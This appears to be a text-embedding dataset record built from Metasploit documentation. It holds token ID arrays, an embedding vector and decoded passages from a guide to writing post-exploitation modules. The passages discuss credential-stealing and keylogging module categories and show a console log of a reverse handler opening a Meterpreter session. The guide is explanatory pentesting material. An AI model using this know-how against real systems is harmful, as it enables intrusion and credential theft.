[ 2017, 2064, 2467, 2224, 1996, 2206, 23561, 2000, 2707, 4975, 2115, 16602, 18077, 1024, 1001, 1001, 1001, 2023, 11336, 5942, 18804, 13102, 4135, 4183, 1024, 24471, 2140, 1001, 2783, 3120, 1024, 24471, 2140, 1001, 1001, 2465, 18804, 13102, 4135, 4183, 5302, 8566, 2571, 1026, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 4635, 1027, 3671, 26763, 2075, 2421, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 1024, 1024, 16770, 2121, 6299, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1005, 2171, 1005, 1027, 1028, 1005, 16770, 2121, 6299, 4666, 2378, 2742, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1003, 1053, 1063, 2182, 1005, 1055, 2019, 2742, 1997, 2478, 1996, 16770, 2121, 6299, 4666, 2378, 1065, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1010, 1005, 3166, 1005, 1027, 1028, 1031, 1005, 26403, 2509, 2099, 1005, 1033, 1010, 1005, 7604, 1005, 1027, 1028, 1031, 1031, 1005, 24471, 2140, 1005, 1010, 1005, 8299, 1024, 1013, 1013, 18804, 13102, 4135, 4183, 1012, 4012, 1005, 1033, 1033, 1010, 1005, 4132, 1005, 1027, 1028, 1005, 2663, 1005, 1010, 1005, 7889, 1005, 1027, 1028, 1031, 1031, 1005, 12391, 1005, 1010, 1063, 1065, 1033, 1010, 1033, 1010, 1005, 19380, 13701, 1005, 1027, 1028, 1005, 2286, 1011, 5840, 1011, 5890, 1005, 1010, 1005, 12398, 7559, 18150, 1005, 1027, 1028, 1014, 1007, 1007, 2203, 13366, 2006, 1035, 5227, 1035, 24471, 2072, 1006, 18856, 2072, 1010, 1035, 5227, 1007, 16129, 1027, 1005, 7592, 1005, 4604, 1035, 3433, 1006, 18856, 2072, 1010, 16129, 1007, 2203, 2203, 2065, 2017, 2215, 2000, 2202, 1037, 3553, 2298, 2012, 2054, 1996, 4666, 2378, 2064, 2079, 1010, 2156, 1024, 24471, 2140, 1013, 1038, 4135, 2497, 1013, 3040, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 18077, 1013, 8299, 1013, 8241, 1012, 21144, 102 ]
metasploit
110.txt
2
[CLS] post module development is a challenge to your programming skills. it ’ s not like writing a memory corruption based exploit, where technically speaking is usually about crafting a malicious input - a string. a post module is more about proper module design, practical knowledge in ruby and the metasploit library. it ’ s also a very valuable skill to have, because if you don ’ t know what to do after popping a shell, what ’ s the point of the penetration test, right? also, what if a module doesn ’ t work? are you willing to wait days, weeks, or maybe even months for someone else to fix it for you? probably not. if you know how to do it yourself, you can probably fix it a lot sooner, and continue with your pentest and do more things. so learn post module development! it ’ s good for you, and your career. plan your modulejust like writing a software, before you start coding you should have a clear and specific goal for what your post module does. it ’ s never a good idea to have multiple functionalities in a single module. for example : having it steal the network configuration files, steal passwd, hashes, shell history, etc. instead, you should break it down into multiple modules. you should also think about what session types to support : meterpreter, or shell. ideally, support both. but if you have to choose between the two, on windows you should favor windows meterpreter. on linux, the shell session type has been a stronger candidate than the linux meterpreter, but hopefully this will change in the near future. for platforms that don ’ t have a meterpreter, obviously your only choice is a shell. another important thing is to think about how your module will perform on different distributions / systems. for example, say you want to run a ifconfig command on linux. on ubuntu it ’ s a no - brainer, simply run the ifconfig command. well, a different linux distro might not actually know what you ’ re asking, so you have to be more specific and do / sbin / ifconfig instead. same thing with windows. is it c : \ windows \ or c : \ winnt? it ’ s both. is it c : \ documents and settings \ [ user name ], or c : \ users \ [ user name ]? both, depends on that windows version. a better solution to that would be use
[ 0.3581635355949402, 0.044681210070848465, -0.5691362619400024, -0.04078691080212593, -1.211256742477417, -0.5274390578269958, 0.2876949608325958, 0.2583082616329193, 0.059169817715883255, 1.356435775756836, 0.20273226499557495, 0.23961542546749115, 0.7535435557365417, -0.7838336229324341, -0.350068598985672, 0.009828077629208565, 0.26116061210632324, -0.11320775747299194, -1.4319275617599487, -0.16114886105060577, -0.10051476955413818, -0.3451748192310333, -0.5198938846588135, -0.6436128616333008, -0.7185664176940918, -0.025197889655828476, 0.5262818932533264, 0.3016521632671356, 0.6861934065818787, 0.8939517736434937, 0.5108494758605957, 0.6100645065307617, -0.5577807426452637, -0.25190332531929016, -0.308784157037735, -0.18450859189033508, 0.42437997460365295, -0.8691695332527161, 0.19120380282402039, -0.44856542348861694, 0.7316144704818726, -0.32074397802352905, 0.1941247135400772, -0.4991617202758789, -0.5175029635429382, -0.3131906986236572, 0.06532380729913712, -0.476988285779953, 0.6581413149833679, -0.6671543121337891, 0.5216164588928223, 0.3477509915828705, -0.085484080016613, 0.2056744545698166, 0.1639036387205124, 0.12463372945785522, 0.09600267559289932, 0.10459837317466736, -0.8045424818992615, 0.3479488492012024, -0.31043577194213867, 0.5147975087165833, -0.06172750145196915, -1.109667181968689, 0.3141593635082245, 0.5232292413711548, 0.1461537480354309, -0.11204156279563904, -0.30094003677368164, -1.029130458831787, -0.502223014831543, 0.4039236009120941, -0.46749329566955566, -0.580658495426178, -0.4602002501487732, 0.0673728957772255, 0.590929388999939, 0.017790906131267548, -0.6272832751274109, 0.6757911443710327, -0.04350389912724495, 0.5345756411552429, -0.27908751368522644, -0.059137292206287384, 0.08817749470472336, -0.5624468326568604, 0.4810442626476288, 0.5998449325561523, -0.7640193104743958, 0.08719591051340103, 0.38326629996299744, 0.2543128430843353, -0.6872012615203857, 0.11072781682014465, 0.46963679790496826, 0.7036930918693542, -0.43357717990875244, -0.10571727156639099, 0.36977618932724, -0.2301092892885208, 0.6086297035217285, 0.37121322751045227, 0.42970743775367737, 0.19320930540561676, -0.05571667477488518, 0.06583374738693237, 0.017580214887857437, 0.04331328347325325, 0.15856586396694183, -0.39771032333374023, 0.45766112208366394, 0.4069134593009949, -0.04109770059585571, -0.677449107170105, -0.3658086657524109, 0.7142979502677917, 0.40183261036872864, 0.21541886031627655, -0.58915114402771, 0.6324524283409119, 0.38130173087120056, -0.47678908705711365, 0.012417444959282875, -0.3915086090564728, 0.3696695864200592, 0.051756102591753006, -0.1874529868364334, 1.0381569862365723, -0.7017740607261658, -0.4962610900402069, -0.12667664885520935, -0.2175072282552719, 0.5280708074569702, 0.43533214926719666, 0.20471513271331787, -0.13791920244693756, -0.5219207406044006, 0.24331484735012054, 0.07986172288656235, -0.90630704164505, -0.248768612742424, 0.4284018278121948, 0.1755511611700058, 1.104286551475525, 0.041104480624198914, -0.23816199600696564, -0.1652119755744934, -0.17850808799266815, -0.23422059416770935, 0.5200910568237305, -0.2151128202676773, -0.665147602558136, 0.094240702688694, -0.3805299401283264, -0.4151955246925354, -0.03177596628665924, -0.5773141384124756, 0.44532856345176697, 0.015134703367948532, 0.32550281286239624, -0.36416152119636536, 1.150377869606018, -0.02777770347893238, 0.4020802676677704, -0.012424465268850327, 0.4068109393119812, -0.5839899778366089, -0.7571890950202942, -0.31395143270492554, 0.05319669097661972, 0.09488827735185623, -0.4315530061721802, 0.23099128901958466, 0.2176360785961151, 1.7832385301589966, 0.905917763710022, 0.070896215736866, -0.21986141800880432, -0.30258676409721375, 0.7949624061584473, -0.6777019500732422, 0.3846975862979889, 0.09935406595468521, 0.7316173911094666, 0.35944318771362305, 0.5202443599700928, -0.20536452531814575, -0.3637406527996063, 0.1975785195827484, -0.10994661599397659, -0.3922032415866852, 0.8863069415092468, 0.10729235410690308, 0.2004474252462387, 0.19506588578224182, -0.15796104073524475, -0.9241282939910889, 0.38887903094291687, -0.3669161796569824, -1.207285761833191, -0.6079195141792297, 0.3023642301559448, 0.025160741060972214, 0.5237624645233154, -0.3337213397026062, -0.7179471850395203, 0.39490723609924316, 0.6190782785415649, -0.22110691666603088, 0.13694536685943604, 1.0916098356246948, -0.47102731466293335, -0.6791048049926758, 0.16800163686275482, -0.41906481981277466, -0.5565308928489685, -0.5429885983467102, 0.3812626600265503, -0.23495371639728546, 0.3459075093269348, -0.15782243013381958, 0.19438402354717255, 0.16763125360012054, 0.017385046929121017, -0.18094730377197266, -0.25955134630203247, -0.02942935936152935, 0.2594718635082245, -0.5503913760185242, -0.02028566412627697, -0.5651680827140808, 0.5751255750656128, 0.31606024503707886, 0.9736148715019226, 0.6086642146110535, -0.6934524774551392, 0.7676825523376465, 0.4843480587005615, 0.11064300686120987, 0.05325278639793396, 0.43779709935188293, 0.614019513130188, 0.08411889523267746, 0.7081207036972046, 0.46516913175582886, 0.5907013416290283, 0.12574760615825653, -0.24562184512615204, 0.05306863412261009, 0.8818773627281189, -0.8949216604232788, 0.6987596750259399, 0.32905513048171997, -0.4403083026409149, -0.10227029025554657, -0.5978049039840698, 0.4290214478969574, 1.1155526638031006, -0.9593405723571777, -0.2662718594074249, 0.4574902355670929, -0.03983993083238602, -0.5729026794433594, -0.02871699631214142, 0.25100192427635193, 0.15607371926307678, -0.017116565257310867, 0.41232797503471375, 0.4477074444293976, -0.5653172731399536, -0.49283403158187866, -0.29983019828796387, -0.9309819340705872, -0.31712809205055237, -0.8703440427780151, 0.1756894737482071, -0.2170371115207672, 0.029480723664164543, 0.5593412518501282, -0.8922115564346313, -0.4092963635921478, 0.0605756975710392, 0.2611309289932251, 0.8658638596534729, 0.35994765162467957, -0.5371413826942444, -0.5872885584831238, -0.023976674303412437, -0.358053594827652, 0.5881553292274475, -0.4445631206035614, -0.46495792269706726, -0.7190000414848328, 0.24006806313991547, -0.17972220480442047, 0.7667499780654907, 0.8986995220184326, 0.3458908498287201, -0.18090124428272247, 0.16895312070846558, -0.24254441261291504, 0.26561880111694336, 0.5973914265632629, -0.3718451261520386, 0.47458308935165405, 0.09077917784452438, -0.47314217686653137, -0.09056809544563293, 0.6283585429191589, 0.5498788356781006, -1.1908667087554932, 0.4926358163356781, -0.3955669403076172, 0.670073926448822, -1.0631901025772095, 0.3906008005142212, 0.2775947153568268, -0.06817992031574249, 0.0976310670375824, -0.6926537156105042, 0.3661341071128845, -0.36599016189575195, 0.33745506405830383, -0.22988884150981903, 0.15168672800064087, 0.509412407875061, 0.03962138295173645, -0.7879786491394043, 0.5191075205802917, -0.4601042568683624, -0.5088180303573608, -0.0549108162522316, -0.02543918415904045, 0.8261137008666992, -0.03961567208170891, 0.4956875741481781, -0.25512489676475525, 0.07446863502264023, -0.509374737739563, 0.10381727665662766, 0.29595041275024414, -0.378852903842926, 0.6691907048225403, 0.25657352805137634, 0.13320648670196533, 0.5679771900177002, 0.48139503598213196, -0.8626242280006409, -0.5288190841674805, 0.15772613883018494, 0.12179015576839447, 0.20616719126701355, 0.5444883108139038, 1.0823850631713867, 0.14205627143383026, 1.2153732776641846, -0.4449353814125061, -0.36228758096694946, 0.04691709578037262, 0.15547528862953186, -0.1234622448682785, 0.19210052490234375, -0.039051398634910583, 0.027325483039021492, -0.5900894999504089, -0.480476051568985, 0.017776792868971825, 0.15729527175426483, 0.41848793625831604, -0.07623366266489029, 0.8989872336387634, 0.2753449082374573, -0.3062744736671448, -0.04602963104844093, -0.34954142570495605, -0.34797078371047974, 0.4178639054298401, 0.41312065720558167, 0.6404238939285278, 0.10913549363613129, 0.2776079773902893, -0.2288653403520584, -0.5186541676521301, 0.21988269686698914, 0.3696257174015045, 0.027087509632110596, -0.4728051722049713, -0.7334215044975281, -0.7830180525779724, -0.2391430288553238, -0.4223807454109192, 0.11873555928468704, 0.4640548825263977, -0.5992206335067749, -0.35499337315559387, -0.9991626143455505, 1.1318904161453247, 0.7405458092689514, 0.5429200530052185, 0.9272446036338806, 0.08674778789281845, -0.7855280637741089, -0.7755683660507202, 0.22131282091140747, 0.07473035901784897, 0.5349875688552856, -0.19470439851284027, 0.951869785785675, -0.19387198984622955, 0.3168918192386627, 0.015090946108102798, 0.2501659691333771, -0.29072126746177673, 0.5513582229614258, -0.03922903910279274, -0.01628345623612404, -0.376288503408432, -0.22704535722732544, -0.20918378233909607, 0.2627783417701721, -0.6776748895645142, -0.6876246333122253, -0.5879489183425903, 0.5028129816055298, 0.07896285504102707, -0.9576712250709534, -0.43526262044906616, -0.5549015998840332, -0.1426464170217514, 0.10795633494853973, 0.20231856405735016, -0.6864016652107239, -0.42583930492401123, -0.39956843852996826, -0.9129835367202759, -0.24466614425182343, 0.6125553846359253, 0.499480664730072, 0.22241763770580292, -0.8507182598114014, 0.1815337836742401, 0.6278111934661865, -0.00794292613863945, -0.4572426974773407, -0.13502049446105957, 0.4784828722476959, 0.36047983169555664, 0.5826777815818787, 0.12546563148498535, -0.6821349859237671, 0.0193372443318367, -0.9361878633499146, 0.28423842787742615, -0.5108641386032104, 0.8942225575447083, 0.011371391825377941, 0.2448013871908188, 0.31956547498703003, 0.5761295557022095, -0.6543792486190796, -0.06444816291332245, -0.17425331473350525, 0.35244590044021606, -0.5205819606781006, 0.26803040504455566, 0.19291596114635468, -0.14162474870681763, -0.5800186991691589, 0.6641131639480591, 0.23611073195934296, -0.2334173619747162, 0.582693874835968, -0.2199849635362625, -0.7208060622215271, 0.6340945959091187, 0.0886940211057663, 0.3812166452407837, -0.07908359169960022, 0.5240904092788696, -0.14417721331119537, -0.7172020077705383, 0.7773750424385071, -0.06280282139778137, 0.04904257133603096, -0.5586482882499695, -0.19704820215702057, -0.035610735416412354, 0.1471828818321228, -0.30009394884109497, 0.5290651321411133, -0.09319689869880676, -0.5032939910888672, -0.06645950675010681, -0.469727486371994, -0.42187991738319397, -0.6087976098060608, 0.11735899746417999, -0.062462083995342255, -0.08688148856163025, 0.11013425141572952, 0.29446864128112793, 0.02474030666053295, -0.10583113878965378, 0.06981507688760757, -0.4330122768878937, 0.029640475288033485, -0.9537845849990845, -0.3640264868736267, -0.6587398052215576, -0.04393565654754639, -0.762633204460144, 0.006245624739676714, -0.4195645749568939, -0.01730540208518505, -0.2042115330696106, 0.19172132015228271, 0.6289741396903992, -0.8293237686157227, -0.43051764369010925, 1.410149335861206, -0.2972496449947357, -0.8830053210258484, -0.18967188894748688, 0.029862146824598312, 0.33537593483924866, 0.18903851509094238, -0.49918943643569946, -0.6382979154586792, -0.3475501239299774, -0.8295400738716125, -0.0008067598682828248, -0.5328827500343323, 0.22303146123886108, -0.9449693560600281, -0.7824200987815857, -0.4345742166042328, 0.4929563105106354, 0.42744144797325134, -1.3163769245147705, 0.2310175895690918, -0.06705878674983978, 0.7695096135139465, -0.4623531401157379, -0.12794911861419678, -0.18886823952198029, -0.24229593575000763, -0.48391979932785034, 0.9071279168128967, -0.051308974623680115, -0.017633702605962753, -0.7129501700401306, -0.2746703326702118, 0.0899483859539032, 0.616696298122406, -0.546773374080658, -0.1829911172389984, -0.08311104029417038, 0.029423469677567482, 0.0008829208090901375, 0.44857609272003174, -0.09822512418031693, 0.7293145060539246, 0.14176544547080994, 0.9833503365516663, -0.14933595061302185, 0.16584618389606476, -0.4912542998790741, -0.031875964254140854, 0.360850989818573, -0.21287405490875244, 0.1999298483133316, -0.4171532392501831, 0.3869820237159729, 0.2771536409854889, 0.008045632392168045, -0.5965296030044556, 0.14837613701820374, -1.0225130319595337, -1.14510178565979, 0.8297215104103088, -0.39036932587623596, -0.0561395101249218, 0.03798025846481323, 0.2885080873966217, 0.6100848913192749, -0.5741866827011108, 0.20857492089271545, 0.9677929282188416, 0.423583447933197, 0.5685085654258728, -1.290466070175171, 0.7665644884109497, 0.7769760489463806, 0.18333539366722107, 0.9716947078704834, -0.029545363038778305, 0.3154739737510681, -0.15881994366645813, -0.2652519941329956, -0.4481641948223114, -0.5862941741943359, 0.08021797984838486, 0.8087350130081177, 0.1579124927520752, 0.5802791714668274, -0.02405071072280407, -1.3456735610961914, -0.014628556556999683, -0.01775684580206871, 0.3792724311351776, 0.07926999777555466, 0.8369007110595703, 0.9901848435401917, 0.08615254610776901, -0.24928498268127441, -0.058780934661626816, -0.5142373442649841, 0.09977882355451584, 0.6697043180465698, 0.45808929204940796, -0.0649990364909172, 0.7030361890792847, 0.2521185278892517, -0.3760904371738434, -0.9636545181274414, -0.9914500117301941, 0.12071488797664642, -0.1415579617023468, -0.7355809211730957, -0.41435208916664124, -0.29868340492248535, 0.05172893404960632, 0.32731062173843384, 0.4949016273021698, -0.4684862494468689, -0.04842692241072655, -0.8599922060966492, -0.0697825625538826, -0.15159156918525696, 0.33464181423187256, 0.5725663304328918, -0.6839665174484253, -0.35349947214126587, -0.5208184123039246, 0.12096212804317474, -0.07462459802627563, 0.039594121277332306, 1.2493090629577637, -0.2897903323173523, 0.48531726002693176, 0.13360176980495453, 0.31997817754745483, 0.24687711894512177, -0.3283673822879791, 0.3398672640323639, 0.4578798711299896, -0.6359385848045349, -0.7202513813972473, -0.12964922189712524, -0.08062028139829636, 0.3772747814655304, 1.0095630884170532, 0.39615392684936523, 0.012056432664394379, -0.03515132889151573, 0.217064768075943, 0.04011910408735275, -0.5513068437576294, -0.47182509303092957, -1.2232677936553955, -0.26422521471977234, 0.1579389125108719, -0.012301496230065823, -0.0670703575015068, 0.14881089329719543, -0.3845970332622528, -0.2815109193325043, 0.015247663483023643, -0.10715287923812866, -0.06430129706859589, -0.19293028116226196, -0.7025877833366394, 0.7834246754646301, -0.6712641716003418, -0.5500873327255249, -0.2709602415561676, 0.2110414057970047, -0.6252844929695129, 0.019306281581521034, -0.34307900071144104, 0.4466383159160614, -0.32717588543891907, 0.2325405329465866, -0.28749769926071167, -0.12077818065881729, -0.1914917528629303, -0.4818789064884186, 0.40051281452178955, 0.7370786070823669, -0.42337146401405334, 0.299784779548645, -0.3109634518623352, -0.299367755651474, 0.3678831160068512, -0.894383430480957, 0.5490973591804504, -0.2852663993835449, -0.11225706338882446, 0.3090082108974457, -0.19585169851779938, -0.7408488988876343, 0.22347593307495117, 0.09194067865610123, -0.9006596803665161, -0.21531455218791962, -1.0899670124053955, 0.013285623863339424, -0.13975314795970917, -0.47806882858276367, 0.40540364384651184, 0.5904737114906311, 0.32924792170524597, -0.05159580335021019, -0.1595749706029892, 0.5420883297920227, 0.8662445545196533, -0.2350386381149292, 0.18773481249809265, 0.13563646376132965, 0.13624568283557892, 0.008449659682810307, 0.41124650835990906, 0.4427017271518707, -1.0923830270767212, 0.044759564101696014, -0.49882522225379944, 0.06257827579975128, -0.1713593602180481, -0.05731208994984627, -0.466423362493515, 0.22676792740821838, 0.4287112057209015, -0.260688453912735, -0.3006260395050049, -0.10386258363723755, -0.03538091853260994, 0.0797005146741867, -1.1305394172668457, 0.0248880498111248, -0.2704292833805084, -1.0059285163879395, -0.008730977773666382, -0.2329065501689911, -0.1263292133808136, -0.16980181634426117, -0.47548648715019226, 0.4047737717628479, -0.08491554111242294, -0.026090675964951515, 0.18793508410453796, 0.559948205947876, -1.0089385509490967, -0.2979362905025482, 0.016617070883512497, 0.25627607107162476, -0.5131956338882446, -0.8819506764411926, -0.01229045819491148, 1.0111528635025024, 0.037607889622449875, -0.3571219742298126, -0.4024033844470978, 0.3871305286884308, 0.25872448086738586, 0.9462953209877014, -0.4280276596546173, 0.24357883632183075, -0.7977685332298279, 0.8869246244430542, -0.41699960827827454, 0.060849376022815704, -0.646034836769104, 0.14855512976646423, 0.15689250826835632, 0.4678412079811096, -0.7316738367080688, 1.2097212076187134, -0.18985868990421295, 0.08808410912752151, 0.8469327092170715, 0.7107560038566589, 0.2187013179063797, -0.3558288812637329, 0.20628656446933746, 0.39827844500541687, 0.2826966643333435, 0.004945206921547651, 0.8376736044883728, -0.12033780664205551, -0.08199285715818405, 0.2996406555175781, -1.1303009986877441, -0.2540777623653412, 0.44391345977783203, 0.14346766471862793, -0.5140721201896667, 0.07779203355312347, -0.5545313358306885, -0.04408771172165871, -0.168955996632576, 0.19897376000881195, 0.6893927454948425, -0.19684270024299622, 0.6692902445793152, 0.008340372703969479, -0.2857564091682434, 1.0918312072753906, 0.32499414682388306, 0.2467661201953888, 0.13443148136138916, -0.22860124707221985, 0.4551188051700592, 0.2053619772195816, -0.6235265731811523, 0.5305873155593872, 0.6243948340415955, 0.4284531772136688, -0.07094688713550568, 0.38083717226982117, -0.20840565860271454, 0.5680423974990845, -0.06235986948013306, 0.00900698360055685, -0.31689539551734924, 0.0962207019329071, 0.08626296371221542, -0.4428682327270508, -0.7099440693855286, 0.7307398915290833, 0.1604708880186081, 0.1590573936700821, -0.2386474460363388, -0.10299419611692429, 0.7173207998275757, -0.2779010534286499, 0.4718843400478363, -0.27136024832725525, 0.34020093083381653, 0.3266710340976715, -0.01308811642229557, -0.6923998594284058, 0.2730116844177246, -0.377908855676651, 0.3353746831417084, 0.19064278900623322, 1.1075278520584106, -0.2881660759449005, 0.49557167291641235, -0.012555919587612152, 0.032897092401981354, -0.1265123337507248, 0.044044043868780136, -0.14522741734981537, -0.03406144678592682, 0.5464328527450562, -0.7188881039619446, 0.37749528884887695, -0.4786735475063324, -0.6645379066467285, -0.1261908859014511, 0.38833826780319214, -0.7907203435897827, 0.11293749511241913, 0.673640787601471, 0.21913184225559235, -0.7642412781715393, -0.8617095947265625, 0.3250981569290161, 0.2903105914592743, 0.8950653076171875, 0.006361958105117083, -0.2356976419687271, -0.16688400506973267, -0.07607098668813705, -0.6396087408065796, 0.7184937596321106, -0.12503623962402344, -0.5417455434799194, -0.10113506019115448, -1.1440528631210327, 0.044026922434568405, -0.13520373404026031, -0.48533639311790466, -0.20255978405475616, 0.9169780611991882, -0.005805352237075567, 0.6103414297103882, -0.05564070865511894, -0.41942298412323, 0.04277021065354347, 0.25571995973587036, 1.194190263748169, -0.2921203672885895, 0.42008256912231445, 0.30196720361709595, -0.11733326315879822, 0.1383294314146042, -0.14344291388988495, 0.5025776624679565, 0.009782779030501842, 0.15639255940914154, 0.09135662764310837, -0.05457686632871628, -0.754956841468811, -0.11926918476819992, -0.1931391954421997, 0.3400528132915497, 0.08363701403141022, -0.09356926381587982, -0.9353697299957275, -0.7910868525505066, -1.1511187553405762, -0.3294174075126648, -0.2935516834259033, 0.41199102997779846, -0.4403342604637146, -0.13631531596183777, 0.7135834097862244, -0.6930240988731384, 4.350732326507568, 1.0313661098480225, 0.3295404016971588, 0.15442593395709991, 0.2583237886428833, 0.7203292846679688, 0.9177942872047424, -0.37749361991882324, 0.7432733178138733, -0.8322165012359619, 0.07435820996761322, 0.01786247454583645, 0.0485563687980175, 0.4944247305393219, 0.3772325813770294, 0.2619592547416687, -0.9602643847465515, 0.20014193654060364, 0.01597454957664013, -0.5906450152397156, -1.4590954780578613, 0.33494946360588074, -0.24135254323482513, 0.9000942707061768, -0.26105064153671265, 0.2724527418613434, -0.5096672773361206, -1.0025475025177002, 0.6360193490982056, -0.28084316849708557, 0.4157973527908325, -0.33446410298347473, 0.3685605525970459, -0.29371315240859985, 0.11860722303390503, 0.18737615644931793, -0.17890925705432892, -0.25664111971855164, -0.16651806235313416, -0.4426499605178833, 0.8711662888526917, 0.18299108743667603, 0.07159917056560516, -0.6959875226020813, 0.21684351563453674, 0.6936627626419067, -0.6021841168403625, 0.5579754710197449, 0.7440410852432251, -0.9922047853469849, 0.5747827887535095, -0.26950356364250183, 0.6956431269645691, 0.5097549557685852, -1.1194164752960205, 0.5281644463539124, -0.11299952119588852, -0.9084929823875427, -0.036274053156375885, -0.20110884308815002, -0.280232697725296, -0.28181907534599304, 0.482119619846344, 0.38305291533470154, -0.1740133911371231, 0.32587116956710815, -0.6074824333190918, 0.29523664712905884, 0.1375807523727417, 0.13046546280384064, -0.4474698007106781, 0.3363456726074219, -0.010624425485730171, -0.6819876432418823, 0.5774666666984558, 0.12309376895427704, -0.17802801728248596, 0.1260901689529419, 0.21987880766391754, -0.4183867871761322, -0.27095839381217957, -0.1855783462524414, -0.6974626779556274, 0.33844003081321716, 0.17333021759986877, 0.5860708355903625, -0.3368127942085266, -0.5660616159439087, -0.12453779578208923, 0.647100031375885, 0.2202553153038025, 0.7338277697563171, -0.34774744510650635, -0.02855796366930008, -0.013882218860089779 ]
[ 101, 2695, 11336, 2458, 2003, 1037, 4119, 2000, 2115, 4730, 4813, 1012, 2009, 1521, 1055, 2025, 2066, 3015, 1037, 3638, 7897, 2241, 18077, 1010, 2073, 10892, 4092, 2003, 2788, 2055, 7477, 2075, 1037, 24391, 7953, 1011, 1037, 5164, 1012, 1037, 2695, 11336, 2003, 2062, 2055, 5372, 11336, 2640, 1010, 6742, 3716, 1999, 10090, 1998, 1996, 18804, 13102, 4135, 4183, 3075, 1012, 2009, 1521, 1055, 2036, 1037, 2200, 7070, 8066, 2000, 2031, 1010, 2138, 2065, 2017, 2123, 1521, 1056, 2113, 2054, 2000, 2079, 2044, 20095, 1037, 5806, 1010, 2054, 1521, 1055, 1996, 2391, 1997, 1996, 20015, 3231, 1010, 2157, 1029, 2036, 1010, 2054, 2065, 1037, 11336, 2987, 1521, 1056, 2147, 1029, 2024, 2017, 5627, 2000, 3524, 2420, 1010, 3134, 1010, 2030, 2672, 2130, 2706, 2005, 2619, 2842, 2000, 8081, 2009, 2005, 2017, 1029, 2763, 2025, 1012, 2065, 2017, 2113, 2129, 2000, 2079, 2009, 4426, 1010, 2017, 2064, 2763, 8081, 2009, 1037, 2843, 10076, 1010, 1998, 3613, 2007, 2115, 7279, 22199, 1998, 2079, 2062, 2477, 1012, 2061, 4553, 2695, 11336, 2458, 999, 2009, 1521, 1055, 2204, 2005, 2017, 1010, 1998, 2115, 2476, 1012, 2933, 2115, 11336, 29427, 2066, 3015, 1037, 4007, 1010, 2077, 2017, 2707, 16861, 2017, 2323, 2031, 1037, 3154, 1998, 3563, 3125, 2005, 2054, 2115, 2695, 11336, 2515, 1012, 2009, 1521, 1055, 2196, 1037, 2204, 2801, 2000, 2031, 3674, 8360, 6447, 1999, 1037, 2309, 11336, 1012, 2005, 2742, 1024, 2383, 2009, 8954, 1996, 2897, 9563, 6764, 1010, 8954, 3413, 21724, 1010, 23325, 2229, 1010, 5806, 2381, 1010, 4385, 1012, 2612, 1010, 2017, 2323, 3338, 2009, 2091, 2046, 3674, 14184, 1012, 2017, 2323, 2036, 2228, 2055, 2054, 5219, 4127, 2000, 2490, 1024, 8316, 28139, 3334, 1010, 2030, 5806, 1012, 28946, 1010, 2490, 2119, 1012, 2021, 2065, 2017, 2031, 2000, 5454, 2090, 1996, 2048, 1010, 2006, 3645, 2017, 2323, 5684, 3645, 8316, 28139, 3334, 1012, 2006, 11603, 1010, 1996, 5806, 5219, 2828, 2038, 2042, 1037, 6428, 4018, 2084, 1996, 11603, 8316, 28139, 3334, 1010, 2021, 11504, 2023, 2097, 2689, 1999, 1996, 2379, 2925, 1012, 2005, 7248, 2008, 2123, 1521, 1056, 2031, 1037, 8316, 28139, 3334, 1010, 5525, 2115, 2069, 3601, 2003, 1037, 5806, 1012, 2178, 2590, 2518, 2003, 2000, 2228, 2055, 2129, 2115, 11336, 2097, 4685, 2006, 2367, 20611, 1013, 3001, 1012, 2005, 2742, 1010, 2360, 2017, 2215, 2000, 2448, 1037, 2065, 8663, 8873, 2290, 3094, 2006, 11603, 1012, 2006, 1057, 8569, 3372, 2226, 2009, 1521, 1055, 1037, 2053, 1011, 4167, 2121, 1010, 3432, 2448, 1996, 2065, 8663, 8873, 2290, 3094, 1012, 2092, 1010, 1037, 2367, 11603, 4487, 3367, 3217, 2453, 2025, 2941, 2113, 2054, 2017, 1521, 2128, 4851, 1010, 2061, 2017, 2031, 2000, 2022, 2062, 3563, 1998, 2079, 1013, 24829, 2378, 1013, 2065, 8663, 8873, 2290, 2612, 1012, 2168, 2518, 2007, 3645, 1012, 2003, 2009, 1039, 1024, 1032, 3645, 1032, 2030, 1039, 1024, 1032, 2663, 3372, 1029, 2009, 1521, 1055, 2119, 1012, 2003, 2009, 1039, 1024, 1032, 5491, 1998, 10906, 1032, 1031, 5310, 2171, 1033, 1010, 2030, 1039, 1024, 1032, 5198, 1032, 1031, 5310, 2171, 1033, 1029, 2119, 1010, 9041, 2006, 2008, 3645, 2544, 1012, 1037, 2488, 5576, 2000, 2008, 2052, 2022, 2224 ]
metasploit
111.txt
0
an environment variable : - ) always do your homework, and contain as many scenarios you can think of. and most importantly, get your vms and test! categories of post modulespost modules are categorized based on their behavior. for example, if it collects data, naturally it goes to the β€œ gather ” category. if it adds / updates / or removes an user, it belongs to β€œ manage ”. here ’ s a list as a reference : categorydescriptiongathermodules that involve data gathering / collecting / enumeration. gather / credentialsmodules that steal credentials. gather / forensicsmodules that involve forensics data gathering. managemodules that modifies / operates / manipulates something on the system. session management related tasks such as migration, injection also go here. reconmodules that will help you learn more about the system in terms of reconnaissance, but not about data stealing. understand this is not the same as β€œ gather ” type modules. wlanmodules that are for wlan related tasks. escalatethis is deprecated, but the modules remain there due to popularity. this used to be the place for privilege escalation modules. all privilege escalation modules are no longer considered as post modules, they ’ re now exploits. capturemodules that involve monitoring something for data collection. for example : key logging. session objectso you know how in lord of the rings, people are totally obsessed with the one ring? well, that ’ s how it is with the session object. the one object you cannot live without, it ’ s your precious. all post modules and other related mixins basically are built on top of the session object, because it knows everything about the compromised host, and allows you to command it. you can use the session method to access the session object, or its alias client. the best way to interact with one is via irb, here ’ s an example of how : msf exploit ( handler ) > run [ * ] started reverse handler on 192. 168. 1. 64 : 4444 [ * ] starting the payload handler... [ * ] sending stage ( 769536 bytes ) to 192. 168. 1. 106 [ * ] meterpreter session 1 opened ( 192. 168. 1. 64 : 4444 - > 192. 168. 1. 106 : 55157 ) at 2014 - 07 - 31 17 : 59 : 36 - 0500 meterpreter > irb [
